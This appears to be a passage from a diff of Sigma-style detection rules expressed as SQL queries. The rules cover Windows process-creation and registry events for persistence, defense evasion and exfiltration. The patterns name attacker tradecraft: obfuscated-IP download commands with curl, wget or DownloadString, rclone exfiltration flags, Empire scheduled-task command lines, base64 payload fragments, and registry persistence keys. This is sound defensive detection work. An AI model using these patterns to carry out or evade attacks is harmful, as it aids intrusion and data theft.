"attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE\\\\DisablePrivacyExperience' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" + "filename": "registry_set_disable_privacy_settings_experience.yml" }, { - "title": "Execution via WorkFolders.exe", - "id": "0bbc6369-43e3-453d-9944-cae58821c173", - "status": "test", - "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", - "author": "Maxime Thiebaut (@0xThiebaut)", + "title": "Register New IFiltre For Persistence", + "id": "b23818c7-e575-4d13-8012-332075ec0a2b", + "status": "experimental", + "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of the uncommon Windows Work Folders feature." + "Legitimate registration of IFilters by the OS or software" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentHandler%' ESCAPE '\\') OR (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentAddinsRegistered\\\\{89BCB740-6119-101A-BCB7-00DD010655AF}%' ESCAPE '\\')) AND NOT (((TargetObject LIKE '%\\\\CLSID\\\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{4887767F-7ADC-4983-B576-88FB643D6F79}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{9694E38A-E081-46ac-99A0-8743C909ACB6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{98de59a0-d175-11cd-a7bd-00006b827d94}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{B4132098-7A03-423D-9463-163CB07C151F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{d044309b-5da6-4633-b085-4ed02522e5a5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D169C14A-5148-4322-92C8-754FC9D018D8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{DD75716E-B42E-4978-BB60-1497B92E30C4}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E772CEB3-E203-4828-ADF1-765713D981B8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{eec97550-47a9-11cf-b952-00aa0051fe20}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_workfolders.yml" + "filename": "registry_set_persistence_ifilter.yml" }, { - "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", - "id": "044ba588-dff4-4918-9808-3f95e8160606", + "title": "Change Winevt Event Access Permission Via Registry", + "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", "status": "experimental", - "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "author": "frack113", "tags": [ - "attack.credential_access" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (NewValue LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR NewValue LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" + "filename": "registry_set_change_winevt_channelaccess.yml" }, { - "title": "Suspicious New Instance Of An Office COM Object", - "id": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", + "title": "Potential Persistence Via Visual Studio Tools for Office", + "id": "9d15044a-7cfe-4d23-8085-6ebc11df7685", "status": "experimental", - "description": "Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.\nThis can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.t1137.006", + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of office automation via scripting" + "Legitimate Addin Installation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Word\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Excel\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Powerpoint\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\VSTO\\\\Security\\\\Inclusion\\\\%' ESCAPE '\\')) AND NOT (((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\integrator.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_office_svchost_parent.yml" + "filename": "registry_set_persistence_office_vsto.yml" }, { - "title": "Potential DLL Sideloading Via DeviceEnroller.EXE", - "id": "e173ad47-4388-4012-ae62-bd13f71c18a8", + "title": "Potential Persistence Via Excel Add-in - Registry", + "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", "status": "experimental", - "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "@gott_cyber", + "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\deviceenroller.exe' ESCAPE '\\' OR OriginalFileName = 'deviceenroller.exe') AND CommandLine LIKE '%/PhoneDeepLink%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND NewValue LIKE '/R %' ESCAPE '\\' AND NewValue LIKE '%.xll' ESCAPE '\\')" ], - "filename": "proc_creation_win_deviceenroller_dll_sideloading.yml" + "filename": "registry_set_persistence_xll.yml" }, { - "title": "HackTool - PowerTool Execution", - "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "title": "Potential Persistence Via Custom Protocol Handler", + "id": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", "status": "experimental", - "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" - ], - "filename": "proc_creation_win_hktl_powertool.yml" - }, - { - "title": "Obfuscated IP Download", - "id": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", - "status": "experimental", - "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.discovery" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate applications registering a new custom protocol handler" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\') AND ((CommandLine LIKE '%//0x%' ESCAPE '\\' OR CommandLine LIKE '%.0x%' ESCAPE '\\' OR CommandLine LIKE '%.00x%' ESCAPE '\\') OR (CommandLine LIKE '%http://\\%%' ESCAPE '\\' AND CommandLine LIKE '%\\%2e%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE 'HKCR\\\\%' ESCAPE '\\' AND NewValue LIKE 'URL:%' ESCAPE '\\') AND NOT ((NewValue LIKE 'URL:ms-%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_obfuscated_ip_download.yml" + "filename": "registry_set_persistence_custom_protocol_handler.yml" }, { - "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", - "id": "56c217c3-2de2-479b-990f-5c109ba8458f", - "status": "test", - "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", - "author": "Markus Neis, @Karneades", + "title": "Add Debugger Entry To Hangs Key For Persistence", + "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "status": "experimental", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.s0111", - "attack.g0022", - "attack.g0060", - "car.2013-08-001", - "attack.t1053.005", - "attack.t1059.001" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "This value is not set by default but could be rarly used by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" + "filename": "registry_set_hangs_debugger_persistence.yml" }, { - "title": "JSC Convert Javascript To Executable", - "id": "52788a70-f1da-40dd-8fbd-73b5865d6568", - "status": "experimental", - "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", - "author": "frack113", + "title": "Suspicious Environment Variable Has Been Registered", + "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", + "status": "test", + "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.persistence" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\jsc.exe' ESCAPE '\\' AND CommandLine LIKE '%.js%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (NewValue IN ('powershell', 'pwsh') OR (NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR NewValue LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR NewValue LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR NewValue LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR NewValue LIKE '%SW52b2tlL%' ESCAPE '\\' OR NewValue LIKE '%ludm9rZS%' ESCAPE '\\' OR NewValue LIKE '%JbnZva2Ut%' ESCAPE '\\' OR NewValue LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR NewValue LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR NewValue LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (NewValue LIKE 'SUVY%' ESCAPE '\\' OR NewValue LIKE 'SQBFAF%' ESCAPE '\\' OR NewValue LIKE 'SQBuAH%' ESCAPE '\\' OR NewValue LIKE 'cwBhA%' ESCAPE '\\' OR NewValue LIKE 'aWV4%' ESCAPE '\\' OR NewValue LIKE 'aQBlA%' ESCAPE '\\' OR NewValue LIKE 'R2V0%' ESCAPE '\\' OR NewValue LIKE 'dmFy%' ESCAPE '\\' OR NewValue LIKE 'dgBhA%' ESCAPE '\\' OR NewValue LIKE 'dXNpbm%' ESCAPE '\\' OR NewValue LIKE 'H4sIA%' ESCAPE '\\' OR NewValue LIKE 'Y21k%' ESCAPE '\\' OR NewValue LIKE 'cABhAH%' ESCAPE '\\' OR NewValue LIKE 'Qzpc%' ESCAPE '\\' OR NewValue LIKE 'Yzpc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_jsc.yml" + "filename": "registry_set_suspicious_env_variables.yml" }, { - "title": "WScript or CScript Dropper", - "id": "cea72823-df4d-4567-950c-0b579eaf0846", + "title": "DNS-over-HTTPS Enabled by Registry", + "id": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", "status": "test", - "description": "Detects wscript/cscript executions of scripts located in user directories", - "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", + "author": "Austin Songer", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1140", + "attack.t1112" ], "falsepositives": [ - "Winzip", - "Other self-extractors" + "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\winzip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode' ESCAPE '\\' AND NewValue = 'secure') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\\\\Enabled' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" ], - "filename": "proc_creation_win_malware_script_dropper.yml" + "filename": "registry_set_dns_over_https_enabled.yml" }, { - "title": "PUA - Rclone Execution", - "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "title": "Potential Persistence Via Outlook Home Page", + "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "status": "experimental", - "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", - "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Detects potential persistence activity via outlook home pages.", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_rclone_execution.yml" + "filename": "registry_set_persistence_outlook_homepage.yml" }, { - "title": "Findstr Launching .lnk File", - "id": "33339be3-148b-4e16-af56-ad16ec6c7e7b", + "title": "Outlook Security Settings Updated - Registry", + "id": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", "status": "test", - "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", - "author": "Trent Liffick", + "description": "Detects changes to the registry values related to outlook security settings", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1202", - "attack.t1027.003" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_findstr_lnk.yml" + "filename": "registry_set_office_outlook_security_settings.yml" }, { - "title": "Execution of Powershell Script in Public Folder", - "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "title": "ServiceDll Hijack", + "id": "612e47e9-8a59-43a6-b404-f48683f45bd6", "status": "experimental", - "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. This is often used as a method of persistence.", + "author": "frack113", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], "falsepositives": [ - "Unlikely" + "Administrative scripts", + "Installation of a service" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR 